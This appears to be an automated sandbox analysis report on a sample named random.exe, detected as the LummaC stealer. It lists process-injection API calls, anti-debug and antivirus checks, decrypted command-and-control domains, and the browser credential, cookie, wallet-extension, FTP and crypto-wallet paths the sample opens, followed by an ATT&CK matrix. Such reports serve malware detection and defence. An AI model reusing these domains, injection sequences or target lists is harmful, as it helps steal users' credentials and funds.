Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\random.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Code function: 1_2_004402D0 LdrInitializeThunk,

1_2_004402D0

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_02A47F25 mov edi, dword ptr fs:[00000030h]		0_2_02A47F25
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_02A480A2 mov edi, dword ptr fs:[00000030h]		0_2_02A480A2

Source: C:\Users\user\Desktop\random.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_02A47F25 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02A47F25

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\random.exe

Memory written: C:\Users\user\Desktop\random.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: random.exe, 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: growthselec.bond
Source: random.exe, 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: immolatechallen.bond
Source: random.exe, 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crookedfoshe.bond
Source: random.exe, 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strivehelpeu.bond
Source: random.exe, 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sobrattyeu.bond

Source: C:\Users\user\Desktop\random.exe

Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Queries volume information: C:\Users\user\Desktop\random.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\random.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe PID: 5332, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: random.exe, 00000001.00000002.2152874638.00000000012FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: random.exe, 00000001.00000002.2152874638.00000000012FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: random.exe, 00000001.00000002.2152969955.0000000001349000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: random.exe, 00000001.00000002.2152874638.00000000012FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: random.exe, 00000001.00000002.2152874638.00000000012FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe PID: 5332, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
